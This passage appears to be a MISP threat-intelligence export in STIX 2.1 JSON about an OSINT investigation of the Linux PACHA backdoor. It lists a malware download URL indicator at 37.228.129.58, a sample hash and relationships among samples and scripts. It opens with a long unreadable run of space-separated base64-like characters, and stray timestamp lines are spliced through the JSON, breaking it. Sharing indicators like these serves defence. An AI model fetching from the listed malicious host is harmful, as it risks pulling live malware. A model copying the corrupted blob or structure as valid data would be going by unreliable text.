0 1 s A s 0 r o T F c a d x j l a 9 W r u x i h w O u k e G A i P 53 B A Y F E f 6 G 3 e w e x E o 7 p A g 0 R 81 X 1 K G V T Z V S s x V t r 9 u q y V 947 G W r X 6 l r m F N I h Q C D K i Y K R w C Z 7 + W l w s b + E V H O g s I i h y e 0 G R 6 N B C Y 8 P I y 1 o H W h 1 W 2 Z q n T Z J M 25 e N G f 0 N 3 + a t n T f s i f 5 B 2 S o i n m a D G l i 8 F c n 4 z v w U z A w 7 L T u e 2 w h a e G O 7 h q w r A 0 m T I Y w 3 Z q v v I C n a z A n p + 7 S O G W m I C m 2 / e b g 8 s q 2 t 8 I + Q e F z x R w 8 H e H Q Z 1 s D M 1 d Y I z T W o o 0 i z L j S C 6 P T L o o u I U j k 3 S Z u I M n X J 89 J 6 P C t v C 7 U 2 G j z B u Q i M z i S b s O x g J t R W n g a I Y q I l s c h a s H a N f X F b m Z I X g L U b a i O y Z S Q J r Q + P r l 2 o T A A F 1 b G 1 c n 4 p d Q a c b I h 9 R z K k 6 c B a p 7 F s 4 Z s v O M k y + 2 v Q x o J a W M i h v O 7 j Y p F E T d P N 9 F l x o T B c H w R g U j D V + v e j 9 z E p a q M O C 8 m Q L g 3 T 88 h w k r r g 9 m T f m 2 G 8 Z n t 8 m Z T b r r x a q 7 M F e 0 y / 5 u H w 0 N v X u l 7 / q g I c 4 A y g m a Z 9 m y R D U n b b f 8 N h v c h 6 U p P V K t j K I 30 F d r j 47 K U s F c y G S / x z c 9 t 7 r N r J n i 4 s Q C f G 5 Y 6 R Z a K G s 565 m g C s C M z Y h u S W t Q M K Z z m z K n A o z G H + 7 F H Z 5 v H k l S 5 k b z 0 c p j l c 0 / f I I x T H + X 6 A B O p 0 i c b Z w G K M 7 t 6 o s l k q 1 N y d z S S S H v r 9 p Z / A 1 P J Q f J i 6 n o E c X L l P F 60 s Y X 8 o / Q d R t 4 x 8 d M F C X i s Q n T 0 t z 81 B 0 L D y m N Y f Y M + N f / 3 s 1 N N T X R J o y X X H l x 84 J P d h y b U j m 72 C r b k H Z / 7 S 1 A D 74 e p U R U J P P L X P W b b 1 d K / s n u d O R 0 3 u K o i q 1 G c i O h q v s e M d 13 G j e I m F L w z a F e X V 0 E Q y T v k c n X E Z D g l y a e j I Y W I Y R F H t F Y h / h z P b 4 T D 0 5 M / U J j h 3 g o L Y D / D 5 F U S Q H G e j 4 S 2 / n u n R s F d S N U i 9 l Z V h j c E L J 0 c B R U 1 + K F b G N N g l N 7 n H p c s l 5 E c h T 97 v Q F f Y V W s I 9 E v X Q J l 9 p v v 5 g C i r q N a w k c t K b C w r u R N F H s 1 f y i v 8 P 2 J E T z 6 z c g j o g I O C l I c U r 25 K H e T z b w O G 7 l T e 1 P 3 s 0 B R R S k F P a d 0 / q j G O W O 5 k I K A M 5 r d r U w 2 L y 8 j X U f K F Z 9 o O l c B l i e I E 4 H N D 2 v 9 l 0 l a S 9 l a A S z c w B i l Y t j l W t t A M U G y C h s e s T A P d N 1 S Y i y w f N H / u m K E E o 0 i k 5 i 5 K G y C t O D F 80 z o t G s K U c l M d A 4 s p w b s H 3 D p u j v 8 L m 0 U r + u F m v V 6 s Q g 6 s O i L k c u e G V 1 G Q g t B t K t m u U M i d c O m 0 R c u a v O X A V s y 8 I z I + E B x D 59 Z z 0 x x 4 G t Q H x v e A O F f k V r F D h i m O 9 M M 3 P J I T B M t U N i x G e X R L m d t 1 N 3 I t X n Y 4 w Q 5 K S x t 8 M a e E 1 p J x B i Q 4 C p Y + B B f J 0 48 F i F y L i O W E y s O T 7 W K M u + n 6 c a / Z q 3 L L d Q / e l 7 t l v F r 2 N d 2 E G G z Q J b 1 V S F v T k u m x q F E K Y f t E k / 8 q c M a P b 1 j B y D 9 J 9 O d T + C 1 O B 8 D Q y 8 l N 9 Y T I Y D c P W Z 1 x f A l T w L n / 68 r D i H k R z Y z p L v 2 w e T 9 Q X q 4 l / D T y D G y H F M m d o q P n Z 3 s Z D 9 l 1 C p G i g 8 z s i Q K h 2 v v l H 0 b O T M 3 m V B j m Q b l w h l N 5 h D d t 7 d V 0 J H L D M M Y k 7 R p F E E v A X v R e U D c c / o x D U 2 T 0 j g D Y w Z L x J u j g Y X i y m M T p L / o 3 a g p R M N q E h N Q W B 9 z i K 7 u l b l n p g q c S c e V X c X 8 T o W J r F G J J M f t p C e V l 4 x E G l Y Y 6 E L j p Y n 8 + r Z b L D P Y E F B M G N J x q 1 Y C m U J f V B + 8 P + 4 K o 5 O q L 4 M m C 56 M r J E 2 / 1 + D f C N Y z 25 s I M W b d N C b k h 85 i z U v f q s C 7 Y H a 4 v y t h V E t 0 y x i b P y 1 t 8 D k J L D E Z x v O U x 1 O H F q t n G k z Q C f r S Q 5 j A / o V b Y y 6 v f D Y 5 Y t R 7 p J S B g H j v g a d q a C Q g 33 Y 7 o d Z g n K A T U 2 c B 61 X N f p N v 0 s S x L L W E c C K X t f l o i / y F S D j b Z D 3 W y F D g i b k 9 L V r V 7 w s s B R / a n i h V k e g h R t e 2 f l 7 B L 2 O F A C p N q X J I U 93 j l 388 H l X b z h q D N + 9 J E w w K c P Z V a X 1 M j I G e 6 O / g O n E y 22 O B Y o S / c H 1 x n x B g E
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T09:09:51Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf240b4-352c-40a3-8aba-40b5950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:09:08.000Z" ,
"modified" : "2019-06-01T09:09:08.000Z" ,
"pattern" : "[url:value = '37.228.129.58/home/slpr' AND url:x_misp_scheme = 'http' AND url:x_misp_resource_path = '/home/slpr']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T09:09:08Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5cf241f4-75b0-43e7-80fe-4487950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:18:00.000Z" ,
"modified" : "2019-06-01T09:18:00.000Z" ,
"labels" : [
"misp:name=\"microblog\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "post" ,
"value" : "latest iptables commands found in new linux #PACHA backdoor sample, MD5=a4ef2477af0c769bb2043bca6b5843c2, the ACCEPTED IP should all be blacklisted." ,
"category" : "Other" ,
"uuid" : "5cf241f4-6b14-49eb-a550-4c70950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "type" ,
"value" : "Twitter" ,
"category" : "Other" ,
"uuid" : "5cf241f4-0f14-491e-b20a-40fa950d210f"
} ,
{
"type" : "url" ,
"object_relation" : "url" ,
"value" : "https://twitter.com/liuya0904/status/1134660970112999425" ,
"category" : "Network activity" ,
"to_ids" : true ,
"uuid" : "5cf241f4-ce4c-45d4-b3f5-465a950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "username" ,
"value" : "liuya0904" ,
"category" : "Other" ,
"uuid" : "5cf241f4-51f8-4638-bd9d-4623950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "state" ,
"value" : "Informative" ,
"category" : "Other" ,
"uuid" : "5cf241f4-54ac-4527-ae4e-45b3950d210f"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "microblog"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5cf24424-33b4-488b-8202-4db5950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:23:48.000Z" ,
"modified" : "2019-06-01T09:23:48.000Z" ,
"labels" : [
"misp:name=\"annotation\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "format" ,
"value" : "markdown" ,
"category" : "Other" ,
"uuid" : "5cf24424-8ee8-46e5-93a9-4a45950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "type" ,
"value" : "Annotation" ,
"category" : "Other" ,
"uuid" : "5cf24424-1584-4e9c-9fea-45e7950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "text" ,
"value" : "OSINT investigation based on the original tweet from Liu Ya which contains a netfilter/iptables script with some IP addresses. By pivoting from the IP addresses, malware samples and script can be found at different locations. This quick analysis include the scripts collected, the samples and the relationships between the various objects." ,
"category" : "Other" ,
"uuid" : "5cf24424-c33c-4187-8f6d-4907950d210f"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "annotation"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--f5b7e7ab-0b50-4285-ac22-baa90eafe67c" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T07:57:37.000Z" ,
"modified" : "2019-06-01T07:57:37.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8" ,
"target_ref" : "x-misp-object--35f44d09-4103-4f11-a1dd-74fb99172734"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--60ac44d9-d531-45b1-8a21-5f140e87475b" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T07:58:21.000Z" ,
"modified" : "2019-06-01T07:58:21.000Z" ,
"relationship_type" : "connects-to" ,
"source_ref" : "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8" ,
"target_ref" : "indicator--5cf22fbc-cecc-465b-a261-4385950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--55d8e5a8-d2fd-4f7e-85ae-eec938dd410d" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T08:19:23.000Z" ,
"modified" : "2019-06-01T08:19:23.000Z" ,
"relationship_type" : "executes" ,
"source_ref" : "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8" ,
"target_ref" : "x-misp-object--5cf234e6-2cd4-43cc-8337-4fa1950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--00d63c2c-7766-4631-b4fc-f6ee684f8368" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T08:20:59.000Z" ,
"modified" : "2019-06-01T08:20:59.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f" ,
"target_ref" : "x-misp-object--49e52bb6-f81f-4516-99e4-e2e04f1c0bc7"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--1a6cb2e6-bfdb-4e77-b5c7-a6ead29e34a8" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T08:22:04.000Z" ,
"modified" : "2019-06-01T08:22:04.000Z" ,
"relationship_type" : "connects-to" ,
"source_ref" : "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f" ,
"target_ref" : "indicator--5cf22fbc-cecc-465b-a261-4385950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--40b561d5-1976-4f05-9e7a-499673ffd659" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T08:24:11.000Z" ,
"modified" : "2019-06-01T08:24:11.000Z" ,
"relationship_type" : "executes" ,
"source_ref" : "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f" ,
"target_ref" : "x-misp-object--5cf235f9-14d0-4bcf-9d72-4b5f950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--738f0138-0374-45b7-8664-00085370a299" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T08:28:37.000Z" ,
"modified" : "2019-06-01T08:28:37.000Z" ,
"relationship_type" : "downloads" ,
"source_ref" : "malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"target_ref" : "indicator--5cf23717-673c-48de-9834-476d950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--6496c0e0-204b-4b7a-83c0-37b8e4d766fa" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T08:31:20.000Z" ,
"modified" : "2019-06-01T08:31:20.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"target_ref" : "indicator--5cf237b6-06bc-4e57-ad7e-31bb950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--5e50743c-8193-4cbb-a7e5-84019278877f" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T08:39:09.000Z" ,
"modified" : "2019-06-01T08:39:09.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"target_ref" : "indicator--5cf2397c-b0a0-475d-b764-4c2a950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--51506d5e-74d1-4cc9-88a3-aaebf0ba002f" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T08:42:17.000Z" ,
"modified" : "2019-06-01T08:42:17.000Z" ,
"relationship_type" : "abuses" ,
"source_ref" : "malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"target_ref" : "indicator--5cf23a31-1db8-4b41-81af-4416950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--b7090b3e-332a-4674-9057-ed0e4c8f85fd" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T08:35:54.000Z" ,
"modified" : "2019-06-01T08:35:54.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "malware--5cf23812-2ae8-4feb-8e8b-4a1f950d210f" ,
"target_ref" : "indicator--5cf238a2-0e5c-447e-a584-4072950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--bab30b8c-f1b5-4fff-b7f5-36a20a0bd247" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T09:03:10.000Z" ,
"modified" : "2019-06-01T09:03:10.000Z" ,
"relationship_type" : "related-to" ,
"source_ref" : "indicator--5cf23ef7-5138-4a1f-b773-4766950d210f" ,
"target_ref" : "indicator--5cf22fbc-cecc-465b-a261-4385950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--77c6b2dd-eed7-4784-8e1f-22ee4a978e57" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T09:09:51.000Z" ,
"modified" : "2019-06-01T09:09:51.000Z" ,
"relationship_type" : "downloaded-from" ,
"source_ref" : "indicator--5cf24083-6de0-42e3-9ae7-4129950d210f" ,
"target_ref" : "indicator--5cf240b4-352c-40a3-8aba-40b5950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--81b16a52-9808-4b78-abbb-6255ed8ad8ee" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-06-01T09:18:00.000Z" ,
"modified" : "2019-06-01T09:18:00.000Z" ,
"relationship_type" : "abuses" ,
"source_ref" : "x-misp-object--5cf241f4-75b0-43e7-80fe-4487950d210f" ,
"target_ref" : "observed-data--5cf2421b-bba0-4844-8d28-43c9950d210f"
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}